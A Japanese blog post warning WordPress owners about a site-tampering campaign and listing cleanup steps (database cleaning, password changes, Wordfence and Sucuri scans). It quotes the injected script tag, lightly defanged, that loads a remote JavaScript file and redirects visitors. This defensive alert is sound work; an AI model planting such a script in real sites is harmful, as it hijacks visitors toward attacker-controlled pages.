【ご注意】WordPressの不正コード改ざん
2022/03/25
WordPressを狙った不正コードによる下記動画のような改ざんが横行しているようです。
下記内容のスクリプトが埋め込まれており、アクセスした人が別ページに飛ばされるといった類のもののようです。
<script type=’text/javascript’ src=’https://sdb.dancewithme.biz/db.js’></script>
※sは故意に全角に変えております
改ざんされた場合は下記の手順で修正してください。
データベース周り
まず、データベースのバックアップをし、データベースの中に入っている不正コードを削除します。
削除したデータをデータベースに戻し、データベースのパスワードも変更しておきましょう。
WordPressでのチェック
まずログインユーザーのパスワードを変更します。
その後、Wordfence Securityプラグインをインストールします。
チェック後異常箇所を変更します。
Sucuri Securityも使ってスクリプトのスキャンをかけておいたほうが良いでしょう。
皆様、ご注意ください。
関連記事
-
-
続・WordPress 不正アクセスとの飽くなき戦い
WordPressへの不正アクセスと引き続き戦う、だいすけです。こんにチワワ! …
-
-
月別アーカイブページでカテゴリ指定
月別アーカイブページでカテゴリ指定したい・・・ でも、query_postsやW …
-
-
外部画像URLもアイキャッチに「Featured Image From URL」
外部画像URLをアイキャッチに出来るプラグインを発見したのでご紹介。 Featu …
-
-
get_postsの初期値が5件だった件
もう、表題のとおりなんですが忘備録。 WordPressのget_postsの初 …
-
-
WEBサイトのスクリーンショットをサムネイル化する
弊社の制作実績を登録していこうと思ったのですが、直近のものだけでも軽く30を超え …
-
-
Limit Login Attempts Reloadedとしてヤツが帰ってきた件
かんたん優秀なセキュリティ、「Limit Login Attempts」 Lim …
-
-
カスタムフィールドの値をURL指定して記事をソートする
WordPressは記事ソートや抽出が中々優秀でして、URLから指定してあげるこ …
-
-
カスタム投稿を使うときのメモメモφ(..)
カスタム投稿タイプとは 通常の「投稿」「固定ページ」等とは違うタイプの投稿方法。 …
-
-
WordPressの管理画面が重くなったら(WPML使用サイト向け)
はっきりとした原因は不明なのですが、WPMLを入れていたWordpressサイト …
-
-
Advanced Custom Fieldsで作ったカスタムフィールドの画像をアイキャッチ画像にする
カスタムフィールドで投稿した画像を自動でアイキャッチ画像にしたかったのですが、A …